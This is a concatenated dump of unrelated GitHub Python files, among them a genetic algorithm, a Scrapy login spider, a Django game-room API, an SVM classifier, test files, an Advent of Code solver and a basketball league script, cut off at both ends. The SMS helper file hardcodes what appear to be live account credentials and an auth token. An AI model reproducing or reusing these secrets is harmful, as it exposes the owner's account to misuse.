inisialisasi_populasi()\r\n\r\nevaluasi_populasi = [(kromosom, evaluasi_kromosom(kromosom)) for kromosom in populasi]\r\n\r\nfor _ in range(NUM_GENERATIONS):\r\n evaluasi_populasi.sort(key=lambda x: x[1])\r\n elites = [kromosom for kromosom, _ in evaluasi_populasi[:NUM_ELITES]]\r\n parents = select_parents([kromosom for kromosom, _ in evaluasi_populasi])\r\n populasi = select_new_generation(populasi, parents, elites)\r\n evaluasi_populasi = [(kromosom, evaluasi_kromosom(kromosom)) for kromosom in populasi]\r\n\r\nbest_kromosom, best_fitness = min(evaluasi_populasi, key=lambda x: x[1])\r\nprint(\"Best solution:\")\r\nprint(\"Value of a =\", best_kromosom[0])\r\nprint(\"Value of b =\", best_kromosom[1])\r\nprint(\"Value of c =\", best_kromosom[2])\r\nprint(\"Value of d =\", best_kromosom[3])\r\nprint(\"Best fitness:\", best_fitness)\r\n","repo_name":"kahlilz/Kahlil-Gibran-Saputra_2109076032-Kecerdasan-Buatan-","sub_path":"Kecerdasan Buatan(Algoritma Genetik).py","file_name":"Kecerdasan Buatan(Algoritma Genetik).py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20278157735","text":"import scrapy\nfrom scrapy.http import Request\nimport json\nimport user_data as user\n\nclass Link():\n link = ''\n date = ''\n def write(self,filename):\n with open(filename,'w') as fh:\n json.dump(self,fh,cls=SpiderEncoder, indent=4)\n\nclass SpiderEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o,Link):\n return {'link': o.link,\n 'date': o.date}\n return super().default(o)\n\nclass DynamicLinkSpider(scrapy.Spider):\n name = 'link_spider'\n start_urls = [\n \"https://moderation.vlstats.com/home/login\"\n ]\n link = ''\n\n def start_requests(self):\n return [Request(url = \"https://moderation.vlstats.com/\", callback = self.login)]\n\n def login(self, response):\n return scrapy.FormRequest('https://moderation.vlstats.com/home/login',\n formdata={\"username\": user.parse_login, \"password\": user.parse_password},\n callback=self.parse_url)\n\n def parse_url(self,response):\n yield response.follow('https://moderation.vlstats.com/agency/invitations',callback=self.parse)\n\n def parse(self, response, **kwargs):\n links = response.xpath(\"//div[@class='input-group']//input[@id='invitationLink-0']//@value\").extract()[0]\n date = response.xpath(\"//div[@class='col-md-8']//small//text()\").get()\n print('----------------------------------------------------')\n print(links)\n print(date)\n print('----------------------------------------------------')\n l = Link()\n l.link=links\n clear_date = date[date.find('until') + 6:]\n l.date = clear_date\n l.write('parse_data.txt')\n","repo_name":"RomanBezuhlyii/ChatZen_Bot","sub_path":"link_spy/link_spy/spiders/link_spider.py","file_name":"link_spider.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17661656608","text":"# 2d lists do not have to be rectangular\na = [ [ 1, 2, 3 ] ,\n [ 4, 5 ],\n [ 6 ],\n [ 7, 8, 9, 10 ] ]\n\nrows = len(a)\nfor row in range(rows):\n columns = len(a[row]) # now cols depends on each row\n print(\"Row\", row, \"has\", columns, \"columns: \", end=\"\")\n for column in range(columns):\n print(a[row][column], \" \", end=\"\")\n print()\n","repo_name":"theguyoverthere/CMU15-112-Spring17","sub_path":"src/Week5/Ragged 2d List/Ragged 2d List.py","file_name":"Ragged 2d 
List.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72593329812","text":"\r\n\r\n\r\n# 主帐号\r\naccountSid = '8aaf07086a43ad03016a582c2ea31652'\r\n\r\n# 主帐号Token\r\naccountToken = '1548573782d6430aab9bca1053b4b4b2'\r\n\r\n# 应用Id\r\nappId = '8aaf07086a43ad03016a582c2ef91659'\r\n\r\n# 请求地址,格式如下,不需要写http://\r\nserverIP = 'app.cloopen.com'\r\n\r\n# 请求端口\r\nserverPort = '8883'\r\n\r\n# REST版本号\r\nsoftVersion = '2013-12-26'\r\n\r\n\r\n# 发送模板短信\r\n# @param to 手机号码\r\n# @param datas 内容数据 格式为列表 例如:['12','34'],如不需替换请填 ''\r\n# @param $tempId 模板Id\r\n\r\n\r\nclass CCP(object):\r\n \"\"\"自己封装的发送短信的辅助类\"\"\"\r\n # 用来保存对象的类属性\r\n instance = None\r\n\r\n def __new__(cls):\r\n # 判断CCP类有没有已经创建好的对象,如果没有,创建一个对象,并且保存\r\n # 如果有,则将保存的对象直接返回\r\n if cls.instance is None:\r\n obj = super(CCP, cls).__new__(cls)\r\n\r\n # 初始化REST SDK\r\n from ihome.libs.yuntongxun.CCPRestSDK import REST\r\n obj.rest = REST(serverIP, serverPort, softVersion)\r\n obj.rest.setAccount(accountSid, accountToken)\r\n obj.rest.setAppId(appId)\r\n\r\n cls.instance = obj\r\n\r\n return cls.instance\r\n\r\n def send_template_sms(self, to, datas, temp_id):\r\n\r\n result = self.rest.sendTemplateSMS(to, datas, temp_id)\r\n status_code = result.get(\"statusCode\")\r\n if status_code == \"000000\":\r\n # 表示发送短信成功\r\n print(\"++++++发送短信成功+++++++\")\r\n return 0\r\n else:\r\n # 发送失败\r\n return -1\r\n","repo_name":"CriusCrius/ihome_flask","sub_path":"ihome/libs/yuntongxun/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13234242176","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport json\n\nimport requests\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom rest_framework import viewsets\nfrom rest_framework.authentication import SessionAuthentication, TokenAuthentication\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.decorators import detail_route\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom ws4redis.publisher import RedisPublisher\nfrom ws4redis.redis_store import RedisMessage\n\nfrom api.serializers import PanelUserSerializer\nfrom game.models import Room\nfrom server.models import GameServer\nfrom .serializers import RoomSerializer\n\nUser = get_user_model()\n\n\ndef _get_available_server():\n game_server_stats = {}\n\n for game_server in GameServer.objects.exclude(status=9):\n game_server_stats[game_server] = game_server.stats['ram']\n\n return min(game_server_stats, key=game_server_stats.get)\n\n\nclass RoomViewSet(viewsets.ModelViewSet):\n queryset = Room.objects.all()\n serializer_class = RoomSerializer\n lookup_field = 'slug'\n\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication, SessionAuthentication)\n\n @detail_route(methods=['get'])\n def users(self, request, **kwargs):\n room = self.get_object()\n\n serializer = PanelUserSerializer(data=room.users, many=True)\n serializer.is_valid()\n\n return Response(serializer.data)\n\n @detail_route(methods=['get'])\n def allowed_actions(self, request, **kwargs):\n room = self.get_object()\n\n if room.status == 0:\n return Response({\n 'join': request.user.room is None and room.users.count() < room.max_players,\n 'leave': 
request.user.room == room,\n 'ready': request.user.room == room and not request.user.ready_to_play,\n 'unready': request.user.room == room and request.user.ready_to_play,\n })\n else:\n return Response({})\n\n @detail_route(methods=['post'])\n def join(self, request, **kwargs):\n room = self.get_object()\n\n if request.user.is_admin:\n raise ValidationError('User is already an admin')\n\n request.user.room = room\n request.user.ready_to_play = False\n request.user.save()\n\n response = self.users(request, **kwargs)\n\n msg = RedisMessage(json.dumps(response.data))\n RedisPublisher(facility='room_detail', groups=[str(room)]).publish_message(msg)\n\n return response\n\n @detail_route(methods=['post'])\n def leave(self, request, **kwargs):\n room = self.get_object()\n\n if request.user.room != room:\n raise ValidationError('You cannot leave a room you are not in')\n\n request.user.room = None\n request.user.save(update_fields=['room'])\n\n if request.user.is_admin:\n\n request.user.is_admin = False\n request.user.save(update_fields=['is_admin'])\n\n if room.users.exists():\n new_admin = room.users.first()\n new_admin.is_admin = True\n new_admin.save(update_fields=['is_admin'])\n\n if not room.users.exists():\n # TODO: self.destroy(request, **kwargs)\n pass\n\n response = self.users(request, **kwargs)\n\n msg = RedisMessage(json.dumps(response.data))\n RedisPublisher(facility='room_detail', groups=[str(room)]).publish_message(msg)\n\n return response\n\n @detail_route(methods=['post'])\n def unready(self, request, **kwargs):\n request.user.ready_to_play = False\n request.user.save(update_fields=['ready_to_play'])\n\n room = self.get_object()\n\n response = self.users(request, **kwargs)\n msg = RedisMessage(json.dumps(response.data))\n RedisPublisher(facility='room_detail', groups=[str(room)]).publish_message(msg)\n\n return response\n\n @detail_route(methods=['post'])\n def ready(self, request, **kwargs):\n request.user.ready_to_play = True\n request.user.save(update_fields=['ready_to_play'])\n\n room = self.get_object()\n game_ready = all([user.ready_to_play for user in room.users.all()])\n\n if game_ready:\n return self._start_game(room)\n\n else:\n response = self.users(request, **kwargs)\n msg = RedisMessage(json.dumps(response.data))\n RedisPublisher(facility='room_detail', groups=[str(room)]).publish_message(msg)\n\n return response\n\n @detail_route(methods=['post'])\n def finished(self, request, **kwargs):\n room = self.get_object()\n\n received_data = request.data\n\n winner = User.objects.get(id=received_data['winner']['panel_user_id'])\n\n winner.wins += 1\n winner.save()\n\n room.status = 0\n room.save()\n\n for user in room.users.all():\n user.ready_to_play = False\n user.save()\n\n ret_data = {\n 'url_path': reverse('room:detail', args=[room.slug])\n }\n\n return Response(status=200, data=json.dumps(ret_data))\n\n def _start_game(self, room):\n\n server = _get_available_server()\n\n # guard against a missing server before using it (moved above the\n # token lookup so the check can actually take effect)\n if server is None:\n return Response(status=400, data=\"{'error': 'No game server available!'}\")\n\n server_user_token, _ = Token.objects.get_or_create(user=server.panel_user)\n\n serialized_data = self.get_serializer(instance=room).data\n\n serialized_data.update({\n 'auth_token': str(server_user_token),\n 'panel_room_id': room.pk,\n 'panel_room_slug': room.slug\n })\n\n data = json.dumps(serialized_data)\n server_without_leading_slash = server.url.rstrip('/')\n\n response = requests.post(\n server_without_leading_slash + \"/api/rooms/create/\",\n data=data,\n headers={\n \"Authorization\": \"Token 
%s\" % server.auth_token,\n \"Content-Type\": \"application/json\",\n })\n\n if response.status_code == 201:\n\n room.server = server\n room.save()\n\n for user in room.users.all():\n user.total_games += 1\n user.save()\n\n response_data = response.json()\n\n for user_data in response_data.get('users'):\n response = {\n 'type': \"PLAY\",\n 'url': server_without_leading_slash + \"/%s/\" % user_data.get('token'),\n }\n msg = RedisMessage(json.dumps(response))\n user = User.objects.get(id=user_data['panel_user_id'])\n RedisPublisher(facility='room_detail', users=[user.username]).publish_message(msg)\n\n room.status = 1\n room.save()\n\n return Response(status=200, data=response)\n\n else:\n return Response(status=400, data=response.content)\n","repo_name":"sterenczak-marek/awesomegame-panel","sub_path":"api/room/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18087002240","text":"import sys\nimport tqdm\nimport matplotlib.pyplot as plt\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.metrics import accuracy_score\n\n\nclass SVM:\n \"\"\"Class for SVM\"\"\"\n\n def __init__(self, X_train, y_train, X_test, y_test, kernel) -> None:\n self.X_train = X_train\n self.y_train = y_train\n self.X_test = X_test\n self.y_test = y_test\n self.regularization = [0.25, 0.5, 0.75, 1.0]\n self.accuracy_list = []\n if kernel != \"Linear\" and kernel != \"Polynomial\" and kernel != \"RBF\":\n sys.exit(\"!!!Please provide valid kernal!!!\")\n self.kernel = kernel\n\n def svm(self):\n print(\"Kernel: \", self.kernel)\n if self.kernel == \"Linear\":\n for _c in tqdm.tqdm(self.regularization):\n self.linear_svm(_c)\n elif self.kernel == \"Polynomial\" or self.kernel == \"RBF\":\n for _c in tqdm.tqdm(self.regularization):\n self.kernel_svm(_c)\n\n def linear_svm(self, _c):\n \"\"\"Function to perform Linear SVM\n\n Args:\n _c (Float): Regularization parameter\n \"\"\"\n model = LinearSVC(\n C=_c,\n loss='hinge',\n multi_class=\"crammer_singer\",\n penalty='l2',\n random_state=None)\n model.fit(self.X_train, self.y_train)\n pred_train = model.predict(self.X_train)\n pred_test = model.predict(self.X_test)\n model_acc = accuracy_score(self.y_train, pred_train)\n test_acc = accuracy_score(self.y_test, pred_test)\n self.accuracy_list.append(model_acc)\n print(\n f\"Regularization : {_c} Test Accuracy : {test_acc:.4f} Training Accuracy : {model_acc:.4f}\")\n\n def kernel_svm(self, _c):\n \"\"\"Function to perform kernel SVM\n\n Args:\n _c (Float): Regularization parameter\n \"\"\"\n if self.kernel == \"Polynomial\":\n model = SVC(kernel='poly', degree=2, gamma='auto', coef0=1, C=_c)\n model.fit(self.X_train, self.y_train)\n pred_train = model.predict(self.X_train)\n pred_test = model.predict(self.X_test)\n model_acc = accuracy_score(self.y_train, pred_train)\n test_acc = accuracy_score(self.y_test, pred_test)\n self.accuracy_list.append(model_acc)\n print(\n f\"Regularization : {_c} Test Accuracy : {test_acc:.4f} Training Accuracy : {model_acc:.4f}\")\n\n else:\n model = SVC(kernel='rbf', gamma=\"auto\", C=_c)\n model.fit(self.X_train, self.y_train)\n pred_train = model.predict(self.X_train)\n pred_test = model.predict(self.X_test)\n model_acc = accuracy_score(self.y_train, pred_train)\n test_acc = accuracy_score(self.y_test, pred_test)\n self.accuracy_list.append(model_acc)\n print(\n f\"Regularization : {_c} Test Accuracy : {test_acc:.4f} Training Accuracy : {model_acc:.4f}\")\n\n 
def plot(self):\n \"\"\"Function to plot the results\n \"\"\"\n plt.figure(1)\n plt.plot(self.regularization, self.accuracy_list)\n plt.title(\"Accuracy wrt c\")\n plt.xlabel(\"Regularization\")\n plt.ylabel(\"Accuracy\")\n plt.show()\n","repo_name":"prat1kbhujbal/Handwritten-digits-Classification","sub_path":"Code/SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36436065071","text":"import numpy as np\nimport numpy.testing as npt\nfrom neurodamus.gap_junction import GapJunctionSynapseReader\nfrom pathlib import Path\n\nSIM_DIR = Path(__file__).parent.parent.absolute() / \"simulations\"\n\n\ndef test_gapjunction_synreaderNRN():\n nrn_file = \"/gpfs/bbp.cscs.ch/project/proj12/jenkins/cellular/circuit-scx-v5-gapjunctions/gap_junctions/nrn_gj.h5\" # noqa\n nrn_reader = GapJunctionSynapseReader.create(nrn_file, 1)\n syn_params_nrn = nrn_reader._load_synapse_parameters(100124)\n # check reading of sgid, junction_id_pre and junction_id_post\n ref_sgids = np.array([94669., 94723., 95634., 95823., 96581.,\n 97338., 97455., 98139., 98432., 100725.,\n 101360., 101506., 101696., 101696., 191567.])\n ref_junction_id_pre = np.array([735., 736., 29., 36., 51.,\n 77., 744., 134., 148., 286.,\n 322., 337., 355., 356., 681.])\n ref_junction_id_post = np.array([1251., 1259., 617., 1354., 1002.,\n 1756., 1027., 924., 709., 624.,\n 1050., 521., 592., 593., 590.])\n npt.assert_allclose(syn_params_nrn.sgid, ref_sgids)\n npt.assert_allclose(syn_params_nrn.D, ref_junction_id_pre)\n npt.assert_allclose(syn_params_nrn.F, ref_junction_id_post)\n\n\ndef test_gapjunction_sonata_reader():\n sonata_file = str(SIM_DIR / \"mini_thalamus_sonata/gapjunction/edges.h5\")\n sonata_reader = GapJunctionSynapseReader.create(sonata_file, 1)\n syn_params_sonata = sonata_reader._load_synapse_parameters(1)\n ref_junction_id_pre = np.array([10257., 43930., 226003., 298841., 324744.,\n 1094745., 1167632., 1172523., 1260104.])\n ref_junction_id_post = np.array([14., 52., 71., 76., 78., 84., 89., 90., 93.])\n ref_weight = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2])\n npt.assert_allclose(syn_params_sonata.D, ref_junction_id_pre)\n npt.assert_allclose(syn_params_sonata.F, ref_junction_id_post)\n npt.assert_allclose(syn_params_sonata.weight, ref_weight)\n","repo_name":"BlueBrain/neurodamus","sub_path":"tests/integration-e2e/test_synapse_reader.py","file_name":"test_synapse_reader.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"6945016722","text":"'''\n Program: gerador.py\n Purpose: Generate a sequence of rectangles identified by the coordinates\n of their top-left corner (x_se, y_se) and bottom-right corner\n (x_id, y_id). 
The base and height sizes, as well as the\n total number of points to be generated, are passed as command-line\n parameters.\n Usage: python gerador.py <base> <altura> <num_areas>\nProgrammer: Amaury Antônio de Castro Junior\n Date: 29/5/2022.\n'''\n\n# Modules used to generate random numbers and to allow command-line\n# parameter passing.\nimport random\nimport sys\n\n# Store the <base> and <altura> values passed on the command line.\nbase = int(sys.argv[1])\naltura = int(sys.argv[2])\n\n# Store the number of areas to be generated, passed on the command\n# line\nnum_areas = int(sys.argv[3])\n\n# Initialize the coordinate values that identify an area\nx_se = y_se = x_id = y_id = 0\n\n# Initialize the count of valid areas. Valid areas must have\n# coordinates (x_se, y_se) and (x_id, y_id) such that (x_se < x_id) AND (y_se > y_id)\nareas_validas = 0\n\n# Loop to generate the coordinate values that identify the areas.\n# <num_areas> sets of coordinates must be generated.\nwhile areas_validas < num_areas:\n\n # Randomly generate the coordinate values\n x_se = random.randint(0,base)\n y_se = random.randint(0,altura)\n x_id = random.randint(0,base)\n y_id = random.randint(0,altura)\n\n # Check whether the generated coordinates are valid, according to the\n # input criteria defined for the project.\n if (x_se < x_id and y_se > y_id):\n\n # If they are valid, print the coordinates and increment the\n # valid-area counter\n print(\"%i %i %i %i\"%(x_se,y_se,x_id,y_id))\n areas_validas += 1\n\n \n","repo_name":"Gefft3/MosaicoImagensSatelite","sub_path":"mosaico/gerador.py","file_name":"gerador.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74364314133","text":"\"\"\" \nAuthor: Darren\nDate: 12/02/2021\n\nSolving https://adventofcode.com/2015/day/13\n\nA list of people sat around the table.\nHappiness scores depend on who sits next to whom. E.g.\n Alice would gain 54 happiness units by sitting next to Bob.\n\nSolution:\n Use a defaultdict to store happiness scores for each person. E.g.\n happiness[Alice][Bob] = 54\n \n Use a set to store all people.\n Find all permutations of people around the table using itertools.permutations().\n Create a dict happiness_for_perms\n For each perm:\n We don't want to process reverse order of perms, so check using <= vs last element\n For each person around the table clockwise:\n Add up the happiness of the adjacent people\n Store happiness for this perm\n\nPart 1:\n Find happiness of optimal seating arrangement\n\nPart 2:\n Add myself, and assume that all happiness relationships are 0, wherever I go.\n \n Add myself to the dict for every other person in the set.\n Add me to the set.\n Repeat Part 1.\n\"\"\"\nimport os\nimport time\nimport re\nfrom itertools import permutations\nfrom collections import defaultdict\n\nSCRIPT_DIR = os.path.dirname(__file__) \nINPUT_FILE = \"input/input.txt\"\n# INPUT_FILE = \"input/sample_input.txt\"\n\ndef main():\n input_file = os.path.join(SCRIPT_DIR, INPUT_FILE)\n with open(input_file, mode=\"rt\") as f:\n data = f.read().splitlines()\n\n print(\"Part 1\")\n # build up a dict of happiness scores for each person\n happiness_by_person = get_happiness_by_person(data)\n\n # create a set of all the people\n people = set(happiness_by_person.keys())\n\n # we don't care where the first person sits, since it's a circle. 
\n # So let's just make person_1 the 'head' of the table\n person_1 = people.pop()\n\n # get all permutations for remaining people around the table, as list of tuples\n # We expect n! perms\n happiness_for_perm, optimum_happiness_perm = find_optimum_happiness(happiness_by_person, person_1, people)\n print(f\"Optimum happiness = {happiness_for_perm[optimum_happiness_perm]} with seating: {optimum_happiness_perm}\")\n\n print(\"\\nPart 2\")\n # Need to add person_1 back in, so that we can add values for Me sitting next to Person_1\n people.add(person_1)\n add_me_to_happiness_by_person(happiness_by_person, people)\n people.remove(person_1)\n people.add('Me')\n\n happiness_for_perm, optimum_happiness_perm = find_optimum_happiness(happiness_by_person, person_1, people)\n print(f\"Optimum happiness = {happiness_for_perm[optimum_happiness_perm]} with seating: {optimum_happiness_perm}\")\n\ndef find_optimum_happiness(happiness_by_person, person_1, people):\n \"\"\" Determine all permutations of seating.\n Reduce number of perms by removing person_1.\n Compute happiness score for each permutation.\n Determine the permutation with the greatest happiness score.\n\n Args:\n happiness_by_person (dict): Happiness adjacency map\n person_1 (str): Arbitrary head of the table\n people (set): The people to seat around the table\n\n Returns:\n tuple: (score, optimum_seating_permutation)\n \"\"\"\n perms = list(permutations(people))\n happiness_for_perm = {}\n for perm in perms:\n # this allows us to remove reverse permutations\n if perm <= perm[::-1]:\n perm = list(perm) # convert perm from tuple to list, to make it mutable\n perm.insert(0, person_1) # such that we can insert the head of the table\n happiness_for_perm[tuple(perm)] = compute_happiness_for_perm(perm, happiness_by_person)\n \n optimum_happiness_perm = max(happiness_for_perm.items(), key=lambda x: x[1])[0]\n return happiness_for_perm, optimum_happiness_perm\n\ndef add_me_to_happiness_by_person(happiness_by_person: dict, people):\n for person in people:\n happiness_by_person[person]['Me'] = 0\n happiness_by_person['Me'][person] = 0\n\ndef compute_happiness_for_perm(seating_arrangement, happiness_by_person):\n happiness = 0\n\n for i, current_person in enumerate(seating_arrangement):\n if i < len(seating_arrangement) - 1:\n current_next_person = seating_arrangement[i+1]\n else:\n current_next_person = seating_arrangement[0]\n\n happiness += happiness_by_person[current_person][current_next_person]\n happiness += happiness_by_person[current_next_person][current_person]\n\n return happiness\n\ndef get_happiness_by_person(data) -> dict[str, dict[str, int]]:\n \"\"\" Here we build an adjacency list.\n We will map each person to every other person.\n Since this is a directed graph, we'll use a defaultdict(dict).\n\n Args:\n data (list): A list of happiness statements\n\n Returns:\n dict: dict[person_x][person_y: happiness]\n \"\"\"\n # Alice would gain 54 happiness units by sitting next to Bob.\n happiness = defaultdict(dict)\n happiness_pattern = re.compile(r\"^(\\w+) would (\\w+) (\\d+) happiness units by sitting next to (\\w+)\")\n \n for line in data:\n person_1, gain_or_lose, value, person_2 = happiness_pattern.findall(line)[0]\n if gain_or_lose == \"gain\":\n value = int(value)\n else:\n value = -(int(value))\n \n happiness[person_1][person_2] = value\n\n return happiness\n\nif __name__ == \"__main__\":\n t1 = time.perf_counter()\n main()\n t2 = time.perf_counter()\n print(f\"Execution time: {t2 - t1:0.4f} 
seconds\")\n","repo_name":"derailed-dash/Advent-of-Code","sub_path":"src/AoC_2015/d13_seating_arrangement_with_circular_set_and_perms/happy_seating.py","file_name":"happy_seating.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"67"} +{"seq_id":"3616383893","text":"import sys\nimport os.path\nsys.path.append(\n os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\nimport ytDownloader\nimport Utils\nimport ytURL\n\ndef set_ytd():\n utils=Utils.Utils()\n yturl=ytURL.ytURL()\n ytdownloader=ytDownloader.ytDownloader(utils=utils,ytURL=yturl)\n return ytdownloader,utils,yturl\n\n\ndef test_setters(url = None):\n if url is None:\n url='https://www.youtube.com/watch?v=GQ-k8i7qkMw&ab_channel=KinoCheck.com'\n ytdownloader,utils,yturl=set_ytd()\n yturl.url=url\n print(yturl.vid_url)\n print(yturl.channel)\n print(yturl.channel_url)\n print(yturl.url_d)\n \n \n \n\n \n \nif __name__=='__main__':\n test_setters()\n# test_parse_url(url='https://www.youtube.com/@KinoCheck.com')","repo_name":"pawelofficial/yt-tts","sub_path":"src3/tests/ytURL_tests.py","file_name":"ytURL_tests.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17859315193","text":"import random\nfrom gameObjects.League import \\\n save_league, load_league\n\n\ndef print_menu():\n print(\"--------------------\\nMenu\\n--------------------\\n\")\n print(\"1 - Start New League\")\n print(\"2 - Schedule\")\n print(\"3 - Standings\")\n print(\"4 - Play Game\")\n print(\"5 - Team Stats\")\n print(\"6 - Edit Roster\")\n print(\"7 - Quit\")\n return int(input(\"\"))\n\n\ndef display_offenses(all_teams):\n print(\"-----------------------\")\n print(\"Team\\t\\t\\tW\\tL\")\n print(\"-----------------------\")\n\n sorted_teams = sorted(all_teams, key=lambda x: (-x.calculate_ppg()))\n for team in sorted_teams:\n print('{0:15} {1:3.2f}'.format(team.college, team.calculate_ppg()))\n\n\ndef display_defenses(all_teams):\n print(\"-----------------------\")\n print(\"Team\\t\\t\\tW\\tL\")\n print(\"-----------------------\")\n\n sorted_teams = sorted(all_teams, key=lambda x: (x.calculate_oppg()))\n for team in sorted_teams:\n print('{0:15} {1:3.2f}'.format(team.college, team.calculate_oppg()))\n\n\ndef show_roster(active_team):\n print(f\"\\n{active_team.college} {active_team.nickname}' Roster:\")\n n = 0\n for athlete in active_team.roster:\n print(f\"{n} - {athlete.display_name()}\")\n n += 1\n\n\ndef edit_player(active_team, val):\n player_to_edit = active_team.roster[val]\n player_name = input(\"Enter player's new name: \")\n if player_name == '0':\n active_team.roster.remove(player_to_edit)\n else:\n name = player_name.split(', ')\n player_to_edit.edit_name(name[0], name[1])\n print()\n\n\ndef edit_roster(active_team):\n done = False\n while not done:\n show_roster(active_team)\n player_name = input(\"Player's Name or Press q to quit: \")\n try:\n val = int(player_name)\n if val < len(active_team.roster):\n edit_player(active_team, val)\n else:\n print(\"That player is not on the roster\")\n except ValueError:\n if player_name == 'q' or player_name == 'Q':\n done = True\n elif active_team.is_player_on_roster(player_name):\n print(\"That player is already on the roster\")\n else:\n name = player_name.split(', ')\n active_team.add_player_to_roster(name[0], name[1])\n\n\nif __name__ == \"__main__\":\n ncaa = load_league()\n\n menu_choice = 
0\n\n while menu_choice != 7:\n menu_choice = print_menu()\n if menu_choice == 1:\n ncaa.start_a_new_league(\"team_list.csv\")\n elif menu_choice == 2:\n for group in ncaa.conferences:\n group.display_schedule()\n print(\"\\n\\n\")\n elif menu_choice == 3:\n for group in ncaa.conferences:\n group.display_standings()\n print(\"\\n\\n\")\n elif menu_choice == 4:\n input_choice = \"Y\"\n while input_choice == \"Y\":\n activeLeague = random.choice(ncaa.conferences)\n activeLeague.play_next_game()\n print(\"\\n\")\n input_choice = str.capitalize(input(\"Play another game? \"))\n elif menu_choice == 5:\n input_choice = input(\"Sort teams by offense (O) or defense (D)\").upper()\n if input_choice == 'O':\n display_offenses(ncaa.team_list)\n elif input_choice == 'D':\n display_defenses(ncaa.team_list)\n else:\n print(\"Not a valid selection -- \")\n elif menu_choice == 6:\n counter = 0\n for college in ncaa.team_list:\n print(f\"{counter} - {college.college} {college.nickname}\")\n counter += 1\n team_choice = int(input(\"Please choose the number of the team you would like to edit: \"))\n if team_choice < len(ncaa.team_list):\n team_to_edit = ncaa.team_list[team_choice]\n edit_roster(team_to_edit)\n else:\n print(\"That choice is out of range!\\n\")\n elif menu_choice == 7:\n pass\n else:\n print(\"Not a viable choice\")\n\n save_league(ncaa)\n","repo_name":"Kevbly13/College_Basketball","sub_path":"Scheduler.py","file_name":"Scheduler.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74602373973","text":"import pytest\nfrom pathlib import Path\nfrom click.testing import CliRunner\n\nfrom scripts.sars_cov_2.extract_typing_data import extract_typing_data\nfrom scripts.util.data_loading import load_yaml\n\n\n@pytest.mark.jira(identifier=\"84e2a22c-3be7-4ac0-9418-e9e5f5a90790\", confirms=\"PSG-3621\")\ndef test_extract_typing_data(tmp_path: Path, typing_data_path: Path, variant_definitions_data_path: Path):\n\n output_yaml_path = tmp_path / \"definitions.yaml\"\n expected_output_yaml_path = typing_data_path / \"expected_sars_cov_2_types.yaml\"\n\n rv = CliRunner().invoke(\n extract_typing_data,\n [\n \"--yaml-input-dir\",\n variant_definitions_data_path,\n \"--output-yaml-file\",\n output_yaml_path,\n ],\n )\n assert rv.exit_code == 0\n assert load_yaml(output_yaml_path) == load_yaml(expected_output_yaml_path)\n","repo_name":"Congenica/psga-pipeline-sars-cov-2","sub_path":"tests/sars_cov_2/test_extract_typing_data.py","file_name":"test_extract_typing_data.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"10927443360","text":"#!/usr/bin/env python3\n\nimport cv_bridge\nimport rospy\nfrom sensor_msgs.msg import CameraInfo, Image, PointCloud2\nimport std_srvs.srv\n\nfrom robot_helpers.spatial import Transform\nfrom robot_helpers.ros import tf\nfrom robot_helpers.ros.conversions import *\nfrom vgn.perception import UniformTSDFVolume\nimport vgn.srv\nfrom vgn.utils import *\n\n\nclass UniformTSDFServer:\n def __init__(self):\n print(\"Initializing TSDF Server\")\n self.load_parameters()\n tf.init()\n self.init_topics()\n self.advertise_services()\n self.cv_bridge = cv_bridge.CvBridge()\n self.integrate = False\n print(\"TSDF server ready\")\n # pub_topics = rospy.get_published_topics()\n # print(f\"Publishing to: {pub_topics}\")\n\n def load_parameters(self):\n # self.frame_id = 
